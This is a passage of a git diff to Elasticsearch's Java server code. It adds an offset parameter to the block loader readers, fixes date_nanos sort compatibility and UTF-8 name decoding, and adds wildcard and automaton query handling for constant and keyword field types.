latestBudgetEstimationForElement, long initialTotalAvailableBudget) { + Budgets updateBudgetEstimation(long latestBudgetEstimationForElement) { + return new Budgets( + this.initialBudgetEstimationForElement, + latestBudgetEstimationForElement, + this.initialTotalAvailableBudget + ); + } + } } private static long newTargetIORateBytesPerSec( diff --git a/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java b/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java index 9956f8105b079..86d962f55a558 100644 --- a/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java +++ b/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java @@ -146,12 +146,21 @@ public SortField sortField( boolean reverse ) { SortField sortField = sortField(missingValue, sortMode, nested, reverse); - // we introduced INT sort type in 8.19 and from 9.1 - if (getNumericType().sortFieldType != SortField.Type.INT + if (getNumericType() == NumericType.DATE_NANOSECONDS + && indexCreatedVersion.before(IndexVersions.V_7_14_0) + && missingValue == null + && Long.valueOf(0L).equals(sortField.getMissingValue())) { + // 7.14 changed the default missing value of sort on date_nanos, from Long.MIN_VALUE + // to 0L - for compatibility we require to a missing value of MIN_VALUE to allow to + // open the index. + sortField.setMissingValue(Long.MIN_VALUE); + return sortField; + } else if (getNumericType().sortFieldType != SortField.Type.INT + // we introduced INT sort type in 8.19 and from 9.1 || indexCreatedVersion.onOrAfter(IndexVersions.INDEX_INT_SORT_INT_TYPE) || indexCreatedVersion.between(IndexVersions.INDEX_INT_SORT_INT_TYPE_8_19, UPGRADE_TO_LUCENE_10_0_0)) { - return sortField; - } + return sortField; + } if ((sortField instanceof SortedNumericSortField) == false) { return sortField; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java index 22b198b10a7ad..f419d87d008fe 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java @@ -98,11 +98,11 @@ protected void writeExtent(BlockLoader.IntBuilder builder, Extent extent) { public BlockLoader.AllReader reader(LeafReaderContext context) throws IOException { return new BlockLoader.AllReader() { @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { var binaryDocValues = context.reader().getBinaryDocValues(fieldName); var reader = new GeometryDocValueReader(); - try (var builder = factory.ints(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (var builder = factory.ints(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(binaryDocValues, docs.get(i), reader, builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java b/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java index 6c9c88f767617..fa835e4356667 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java @@ -56,7 +56,7 @@ public ArraySourceValueFetcher(Set sourcePaths, Object nullValue) { @Override public List fetchValues(Source source, int doc, List ignoredValues) { - List values = new ArrayList<>(); + ArrayList values = new ArrayList<>(); for (String path : sourcePaths) { Object sourceValue = source.extractValue(path, nullValue); if (sourceValue == null) { @@ -70,6 +70,7 @@ public List fetchValues(Source source, int doc, List ignoredValu ignoredValues.add(sourceValue); } } + values.trimToSize(); return values; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java index 363e956f1b211..850a2c0bc99f9 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java @@ -124,10 +124,10 @@ private static class SingletonLongs extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -173,9 +173,9 @@ private static class Longs extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -259,10 +259,10 @@ private static class SingletonInts extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -308,9 +308,9 @@ private static class Ints extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -408,10 +408,10 @@ private static class SingletonDoubles extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -461,9 +461,9 @@ private static class Doubles extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -544,10 +544,10 @@ private static class DenseVectorValuesBlockReader extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { // Doubles from doc values ensures that the values are in order - try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count(), dimensions)) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count() - offset, dimensions)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < iterator.docID()) { throw new IllegalStateException("docs within same block must be in order"); @@ -645,19 +645,19 @@ private BlockLoader.Block readSingleDoc(BlockFactory factory, int docId) throws if (ordinals.advanceExact(docId)) { BytesRef v = ordinals.lookupOrd(ordinals.ordValue()); // the returned BytesRef can be reused - return factory.constantBytes(BytesRef.deepCopyOf(v)); + return factory.constantBytes(BytesRef.deepCopyOf(v), 1); } else { - return factory.constantNulls(); + return factory.constantNulls(1); } } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - if (docs.count() == 1) { - return readSingleDoc(factory, docs.get(0)); + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + if (docs.count() - offset == 1) { + return readSingleDoc(factory, docs.get(offset)); } - try (BlockLoader.SingletonOrdinalsBuilder builder = factory.singletonOrdinalsBuilder(ordinals, docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (var builder = factory.singletonOrdinalsBuilder(ordinals, docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < ordinals.docID()) { throw new IllegalStateException("docs within same block must be in order"); @@ -700,9 +700,9 @@ private static class Ordinals extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BytesRefBuilder builder = factory.bytesRefsFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BytesRefBuilder builder = factory.bytesRefsFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < ordinals.docID()) { throw new IllegalStateException("docs within same block must be in order"); @@ -780,9 +780,9 @@ private static class BytesRefsFromBinary extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -879,9 +879,9 @@ private static class DenseVectorFromBinary extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count(), dimensions)) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count() - offset, dimensions)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -963,10 +963,10 @@ private static class SingletonBooleans extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -1012,9 +1012,9 @@ private static class Booleans extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java index 640a629410451..9c2711eeff333 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java @@ -43,7 +43,7 @@ interface ColumnAtATimeReader extends Reader { /** * Reads the values of all documents in {@code docs}. */ - BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException; + BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException; } interface RowStrideReader extends Reader { @@ -149,8 +149,8 @@ public String toString() { */ class ConstantNullsReader implements AllReader { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - return factory.constantNulls(); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + return factory.constantNulls(docs.count() - offset); } @Override @@ -183,8 +183,8 @@ public Builder builder(BlockFactory factory, int expectedCount) { public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) { return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) { - return factory.constantBytes(value); + public Block read(BlockFactory factory, Docs docs, int offset) { + return factory.constantBytes(value, docs.count() - offset); } @Override @@ -261,8 +261,8 @@ public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) throws } return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - return reader.read(factory, docs); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + return reader.read(factory, docs, offset); } @Override @@ -408,13 +408,13 @@ interface BlockFactory { /** * Build a block that contains only {@code null}. */ - Block constantNulls(); + Block constantNulls(int count); /** * Build a block that contains {@code value} repeated * {@code size} times. */ - Block constantBytes(BytesRef value); + Block constantBytes(BytesRef value, int count); /** * Build a reader for reading keyword ordinals. diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java index 72d39b7f59ca2..9d65f0ed8ba2b 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java @@ -469,7 +469,7 @@ public String toString() { /** * Convert a {@link String} into a utf-8 {@link BytesRef}. */ - static BytesRef toBytesRef(BytesRef scratch, String v) { + public static BytesRef toBytesRef(BytesRef scratch, String v) { int len = UnicodeUtil.maxUTF8Length(v.length()); if (scratch.bytes.length < len) { scratch.bytes = new byte[len]; diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java index f56bfb098ed85..a1f5dc4381f50 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java @@ -35,10 +35,10 @@ public boolean canReuse(int startingDocID) { return true; } - private abstract static class StoredFieldsBlockLoader implements BlockLoader { + public abstract static class StoredFieldsBlockLoader implements BlockLoader { protected final String field; - StoredFieldsBlockLoader(String field) { + public StoredFieldsBlockLoader(String field) { this.field = field; } @@ -112,10 +112,10 @@ protected BytesRef toBytesRef(Object v) { } } - private abstract static class Bytes extends BlockStoredFieldsReader { + public abstract static class Bytes extends BlockStoredFieldsReader { private final String field; - Bytes(String field) { + public Bytes(String field) { this.field = field; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java index a3b10ea901395..3a1a805a25b64 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't emit falses before trues so we conform to the doc values contract and can use booleansFromDocValues - try (BlockLoader.BooleanBuilder builder = factory.booleans(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.BooleanBuilder builder = factory.booleans(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java b/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java index 5ecb75b09408c..0b246c2492fdb 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java @@ -15,6 +15,8 @@ import org.apache.lucene.search.MultiTermQuery; import org.apache.lucene.search.Query; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; import org.elasticsearch.common.lucene.search.Queries; import org.elasticsearch.common.regex.Regex; import org.elasticsearch.core.Nullable; @@ -23,6 +25,7 @@ import java.util.Collection; import java.util.Map; +import java.util.function.Supplier; /** * A {@link MappedFieldType} that has the same value for all documents. @@ -135,9 +138,47 @@ public final Query wildcardQuery(String value, boolean caseInsensitive, QueryRew } } + /** + * Returns a query that matches all documents or no documents + * It usually calls {@link #wildcardQuery(String, boolean, QueryRewriteContext)} + * except for IndexFieldType which overrides this method to use its own matching logic. + */ + public Query wildcardLikeQuery(String value, boolean caseInsensitive, QueryRewriteContext context) { + return wildcardQuery(value, caseInsensitive, context); + } + @Override public final boolean fieldHasValue(FieldInfos fieldInfos) { // We consider constant field types to always have value. return true; } + + /** + * Returns the constant value of this field as a string. + * Based on the field type, we need to get it in a different way. + */ + public abstract String getConstantFieldValue(SearchExecutionContext context); + + /** + * Returns a query that matches all documents or no documents + * depending on whether the constant value of this field matches or not + */ + @Override + public Query automatonQuery( + Supplier automatonSupplier, + Supplier characterRunAutomatonSupplier, + @Nullable MultiTermQuery.RewriteMethod method, + SearchExecutionContext context, + String description + ) { + CharacterRunAutomaton compiled = characterRunAutomatonSupplier.get(); + boolean matches = compiled.run(getConstantFieldValue(context)); + if (matches) { + return new MatchAllDocsQuery(); + } else { + return new MatchNoDocsQuery( + "The \"" + context.getFullyQualifiedIndex().getName() + "\" query was rewritten to a \"match_none\" query." + ); + } + } } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java index fb97b0f84c50f..0ec899e19a1cd 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't sort the values sort, so we can't use factory.longsFromDocValues - try (BlockLoader.LongBuilder builder = factory.longs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.LongBuilder builder = factory.longs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java index d762acda9f7e4..f01cc65775e6e 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't sort the values sort, so we can't use factory.doublesFromDocValues - try (BlockLoader.DoubleBuilder builder = factory.doubles(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.DoubleBuilder builder = factory.doubles(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java index d8d8200baac31..812192d79cdce 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java @@ -181,8 +181,12 @@ static NameValue decode(Object field) { int encodedSize = ByteUtils.readIntLE(bytes, 0); int nameSize = encodedSize % PARENT_OFFSET_IN_NAME_OFFSET; int parentOffset = encodedSize / PARENT_OFFSET_IN_NAME_OFFSET; - String name = new String(bytes, 4, nameSize, StandardCharsets.UTF_8); - BytesRef value = new BytesRef(bytes, 4 + nameSize, bytes.length - nameSize - 4); + + String decoded = new String(bytes, 4, bytes.length - 4, StandardCharsets.UTF_8); + String name = decoded.substring(0, nameSize); + int nameByteCount = name.getBytes(StandardCharsets.UTF_8).length; + + BytesRef value = new BytesRef(bytes, 4 + nameByteCount, bytes.length - nameByteCount - 4); return new NameValue(name, parentOffset, value, null); } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java index 33c6ff15cccfd..79754a4c63b30 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java @@ -10,9 +10,13 @@ package org.elasticsearch.index.mapper; import org.apache.lucene.search.MatchAllDocsQuery; +import org.apache.lucene.search.MatchNoDocsQuery; +import org.apache.lucene.search.MultiTermQuery; import org.apache.lucene.search.Query; import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.Strings; +import org.elasticsearch.common.regex.Regex; +import org.elasticsearch.core.Nullable; import org.elasticsearch.index.fielddata.FieldData; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; @@ -27,6 +31,7 @@ import java.util.Collections; import java.util.List; +import java.util.Locale; public class IndexFieldMapper extends MetadataFieldMapper { @@ -102,6 +107,38 @@ public StoredFieldsSpec storedFieldsSpec() { }; } + @Override + public Query wildcardLikeQuery( + String value, + @Nullable MultiTermQuery.RewriteMethod method, + boolean caseInsensitve, + SearchExecutionContext context + ) { + String indexName = context.getFullyQualifiedIndex().getName(); + return getWildcardLikeQuery(value, caseInsensitve, indexName); + } + + @Override + public Query wildcardLikeQuery(String value, boolean caseInsensitive, QueryRewriteContext context) { + String indexName = context.getFullyQualifiedIndex().getName(); + return getWildcardLikeQuery(value, caseInsensitive, indexName); + } + + private static Query getWildcardLikeQuery(String value, boolean caseInsensitve, String indexName) { + if (caseInsensitve) { + value = value.toLowerCase(Locale.ROOT); + indexName = indexName.toLowerCase(Locale.ROOT); + } + if (Regex.simpleMatch(value, indexName)) { + return new MatchAllDocsQuery(); + } + return new MatchNoDocsQuery("The \"" + indexName + "\" query was rewritten to a \"match_none\" query."); + } + + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getFullyQualifiedIndex().getName(); + } } public IndexFieldMapper() { diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java index 9708753926e1d..82960224e13bf 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java @@ -57,6 +57,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, indexMode, caseInsensitive); } + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getIndexSettings().getMode().getName(); + } + @Override public Query existsQuery(SearchExecutionContext context) { return new MatchAllDocsQuery(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java index 48d78129b8781..b232a8e1fc45a 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't pre-sort our output so we can't use bytesRefsFromDocValues - try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java index f8af7043b13dd..594b27f029901 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java @@ -24,6 +24,7 @@ import org.apache.lucene.index.IndexReader; import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.index.MultiTerms; +import org.apache.lucene.index.Term; import org.apache.lucene.index.Terms; import org.apache.lucene.index.TermsEnum; import org.apache.lucene.search.MultiTermQuery; @@ -31,6 +32,7 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.automaton.Automata; import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; import org.apache.lucene.util.automaton.CompiledAutomaton; import org.apache.lucene.util.automaton.CompiledAutomaton.AUTOMATON_TYPE; import org.apache.lucene.util.automaton.Operations; @@ -51,6 +53,7 @@ import org.elasticsearch.index.fielddata.SourceValueFetcherSortedBinaryIndexFieldData; import org.elasticsearch.index.fielddata.StoredFieldSortedBinaryIndexFieldData; import org.elasticsearch.index.fielddata.plain.SortedSetOrdinalsIndexFieldData; +import org.elasticsearch.index.query.AutomatonQueryWithDescription; import org.elasticsearch.index.query.SearchExecutionContext; import org.elasticsearch.index.similarity.SimilarityProvider; import org.elasticsearch.script.Script; @@ -82,6 +85,7 @@ import java.util.Map; import java.util.Objects; import java.util.Set; +import java.util.function.Supplier; import static org.apache.lucene.index.IndexWriter.MAX_TERM_LENGTH; import static org.elasticsearch.core.Strings.format; @@ -509,6 +513,7 @@ public static final class KeywordFieldType extends StringFieldType { private final IndexMode indexMode; private final IndexSortConfig indexSortConfig; private final boolean hasDocValuesSkipper; + private final String originalName; public KeywordFieldType( String name, @@ -537,6 +542,7 @@ public KeywordFieldType( this.indexMode = builder.indexMode; this.indexSortConfig = builder.indexSortConfig; this.hasDocValuesSkipper = DocValuesSkipIndexType.NONE.equals(fieldType.docValuesSkipIndexType()) == false; + this.originalName = isSyntheticSource ? name + "._original" : null; } public KeywordFieldType(String name, boolean isIndexed, boolean hasDocValues, Map meta) { @@ -551,6 +557,7 @@ public KeywordFieldType(String name, boolean isIndexed, boolean hasDocValues, Ma this.indexMode = IndexMode.STANDARD; this.indexSortConfig = null; this.hasDocValuesSkipper = false; + this.originalName = null; } public KeywordFieldType(String name) { @@ -576,6 +583,7 @@ public KeywordFieldType(String name, FieldType fieldType) { this.indexMode = IndexMode.STANDARD; this.indexSortConfig = null; this.hasDocValuesSkipper = DocValuesSkipIndexType.NONE.equals(fieldType.docValuesSkipIndexType()) == false; + this.originalName = null; } public KeywordFieldType(String name, NamedAnalyzer analyzer) { @@ -590,6 +598,7 @@ public KeywordFieldType(String name, NamedAnalyzer analyzer) { this.indexMode = IndexMode.STANDARD; this.indexSortConfig = null; this.hasDocValuesSkipper = false; + this.originalName = null; } @Override @@ -1042,6 +1051,26 @@ public IndexSortConfig getIndexSortConfig() { public boolean hasDocValuesSkipper() { return hasDocValuesSkipper; } + + @Override + public Query automatonQuery( + Supplier automatonSupplier, + Supplier characterRunAutomatonSupplier, + @Nullable MultiTermQuery.RewriteMethod method, + SearchExecutionContext context, + String description + ) { + return new AutomatonQueryWithDescription(new Term(name()), automatonSupplier.get(), description); + } + + /** + * The name used to store "original" that have been ignored + * by {@link KeywordFieldType#ignoreAbove()} so that they can be rebuilt + * for synthetic source. + */ + public String originalName() { + return originalName; + } } private final boolean indexed; @@ -1094,7 +1123,7 @@ private KeywordFieldMapper( this.useDocValuesSkipper = useDocValuesSkipper; this.offsetsFieldName = offsetsFieldName; this.indexSourceKeepMode = indexSourceKeepMode; - this.originalName = isSyntheticSource ? fullPath() + "._original" : null; + this.originalName = mappedFieldType.originalName(); } @Override @@ -1154,7 +1183,7 @@ private boolean indexValue(DocumentParserContext context, XContentString value) // Save a copy of the field so synthetic source can load it var utfBytes = value.bytes(); var bytesRef = new BytesRef(utfBytes.bytes(), utfBytes.offset(), utfBytes.length()); - context.doc().add(new StoredField(originalName(), bytesRef)); + context.doc().add(new StoredField(originalName, bytesRef)); } return false; } @@ -1265,15 +1294,6 @@ boolean hasNormalizer() { return normalizerName != null; } - /** - * The name used to store "original" that have been ignored - * by {@link KeywordFieldType#ignoreAbove()} so that they can be rebuilt - * for synthetic source. - */ - private String originalName() { - return originalName; - } - @Override protected SyntheticSourceSupport syntheticSourceSupport() { if 